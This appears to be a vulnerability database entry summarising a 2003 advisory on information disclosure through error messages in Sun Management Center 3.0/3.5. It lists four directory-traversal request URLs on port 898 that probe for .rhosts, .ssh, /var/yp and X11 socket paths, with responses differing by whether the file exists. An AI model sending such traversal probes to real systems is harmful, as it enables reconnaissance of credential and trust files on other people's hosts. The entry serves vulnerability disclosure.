Sun Management Center 3.0/3.5 - Error Message Information Disclosure

Author: Jon Hart
type: remote
platform: solaris
port: 
date_added: 2003-10-22  
date_updated: 2012-12-09  
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 23272.txt  

source: https://www.securityfocus.com/bid/8873/info

A problem in the handling of error messages has been identified in Sun Management Center. Because of this, an attacker may be able to gain sensitive information about vulnerable hosts.

http://www.example.com:898/../../../../../tmp/.X11-unix
http://www.example.com:898/../../../../../.rhosts
http://www.example.com:898/../../../../../.ssh
http://www.example.com:898/../../../../../var/yp

These examples were return different error messages based on whether the requested resource exists or not.